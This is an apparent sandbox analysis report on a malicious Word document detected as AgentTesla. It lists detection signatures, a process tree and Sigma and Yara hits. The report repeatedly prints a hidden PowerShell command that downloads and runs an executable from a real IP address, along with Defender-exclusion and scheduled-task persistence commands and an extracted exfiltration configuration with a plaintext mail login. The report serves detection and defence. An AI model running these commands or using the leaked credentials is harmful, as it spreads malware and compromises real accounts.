Play interactive tour

Edit tour

Windows Analysis Report PAGO DEL SALDO.doc

Overview

General Information

Sample Name:	PAGO DEL SALDO.doc
Analysis ID:	528739
MD5:	1956fa2feaef4b6fcf3e63f51aa26722
SHA1:	b35003f1c1a874468dbe41370cea443aafb10915
SHA256:	1caadbc09c710b7cdd91598babd238a59708111a59487888bb00f3945c09103c
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Document exploit detected (drops PE files)

Yara detected AgentTesla

Yara detected AntiVM3

Document exploit detected (creates forbidden files)

Found malware configuration

Sigma detected: Powershell download and execute file

Tries to steal Mail credentials (via file / registry access)

Document contains OLE streams with names of living off the land binaries

Sigma detected: Change PowerShell Policies to a Unsecure Level

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Powershell drops PE file

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

Document exploit detected (process start blacklist hit)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Microsoft Office creates scripting files

Installs a global keyboard hook

Office process drops PE file

Injects files into Windows application

Tries to harvest and steal ftp login credentials

Bypasses PowerShell execution policy

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: PowerShell DownloadFile

Tries to download and execute files (via powershell)

Sigma detected: Suspicius Add Task From User AppData Temp

Suspicious powershell command line found

Document contains a stream with embedded javascript code

Sigma detected: Powershell Defender Exclusion

Found suspicious RTF objects

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Antivirus or Machine Learning detection for unpacked file

Document has an unknown application name

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sigma detected: Verclsid.exe Runs COM Object

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Dropped file seen in connection with other malware

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Yara detected Credential Stealer

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Enables debug privileges

Document contains no OLE stream with summary information

Found inlined nop instructions (likely shell or obfuscated code)

Sigma detected: PowerShell Download from URL

Detected TCP or UDP traffic on non-standard ports

Uses SMTP (mail sending)

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2556 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

powershell.exe (PID: 308 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

task.exe (PID: 2780 cmdline: "C:\Users\user\AppData\Roaming\task.exe" MD5: F65B0793251364C03D06E8E7134FC21B)

powershell.exe (PID: 2732 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 1912 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

task.exe (PID: 572 cmdline: C:\Users\user\AppData\Roaming\task.exe MD5: F65B0793251364C03D06E8E7134FC21B)

powershell.exe (PID: 2800 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

powershell.exe (PID: 324 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

verclsid.exe (PID: 2844 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)

notepad.exe (PID: 1868 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "dubai@skycomex.com", "Password": "@EHbqYU1", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000005.00000002.424289946.0000000000360000.00000004.00000020.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x325b:$sb1: -W Hidden 0x324b:$sc1: -NoP 0x3255:$sd1: -NonI 0x3265:$se3: -ExecutionPolicy bypass 0x3250:$sf1: -sta
00000003.00000002.429522504.0000000000170000.00000004.00000020.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x325b:$sb1: -W Hidden 0x324b:$sc1: -NoP 0x3255:$sd1: -NonI 0x3265:$se3: -ExecutionPolicy bypass 0x3250:$sf1: -sta
0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: task.exe PID: 2780	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: task.exe PID: 2780	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author
14.0.task.exe.400000.11.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.0.task.exe.400000.11.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
14.0.task.exe.400000.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.0.task.exe.400000.5.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
14.0.task.exe.400000.13.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.0.task.exe.400000.13.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
9.2.task.exe.33d4df8.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.task.exe.33d4df8.5.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
9.2.task.exe.22ff1b8.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
9.2.task.exe.339ebd8.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.task.exe.339ebd8.6.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
14.0.task.exe.400000.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.0.task.exe.400000.7.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
14.2.task.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.2.task.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
9.2.task.exe.339ebd8.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.task.exe.339ebd8.6.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
14.0.task.exe.400000.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.0.task.exe.400000.9.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
9.2.task.exe.33d4df8.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.task.exe.33d4df8.5.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 16 entries

Sigma Overview

System Summary:

Sigma detected: Change PowerShell Policies to a Unsecure Level

Show sources

Source: Process started

Author: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

Sigma detected: PowerShell DownloadFile

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

Sigma detected: Suspicius Add Task From User AppData Temp

Show sources

Source: Process started

Author: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\task.exe" , ParentImage: C:\Users\user\AppData\Roaming\task.exe, ParentProcessId: 2780, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp, ProcessId: 1912

Sigma detected: Powershell Defender Exclusion

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\task.exe" , ParentImage: C:\Users\user\AppData\Roaming\task.exe, ParentProcessId: 2780, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe, ProcessId: 2732

Sigma detected: Verclsid.exe Runs COM Object

Show sources

Source: Process started

Author: Victor Sergeev, oscd.community: Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 2844

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Show sources

Source: Process started

Author: James Pemberton / @4A616D6573: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

Sigma detected: PowerShell Download from URL

Show sources

Source: Process started

Author: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

Data Obfuscation:

Sigma detected: Powershell download and execute file

Show sources

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 14.0.task.exe.400000.13.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "dubai@skycomex.com", "Password": "@EHbqYU1", "Host": "us2.smtp.mailhostbox.com"}

Source: 14.0.task.exe.400000.13.unpack	Avira: Label: TR/Spy.Gen8
Source: 14.0.task.exe.400000.5.unpack	Avira: Label: TR/Spy.Gen8
Source: 14.0.task.exe.400000.11.unpack	Avira: Label: TR/Spy.Gen8
Source: 14.0.task.exe.400000.7.unpack	Avira: Label: TR/Spy.Gen8
Source: 14.0.task.exe.400000.9.unpack	Avira: Label: TR/Spy.Gen8

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: :\Windows\dll\mscorlib.pdb0 source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb, source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: task[1].exe.0.dr

Jump to dropped file

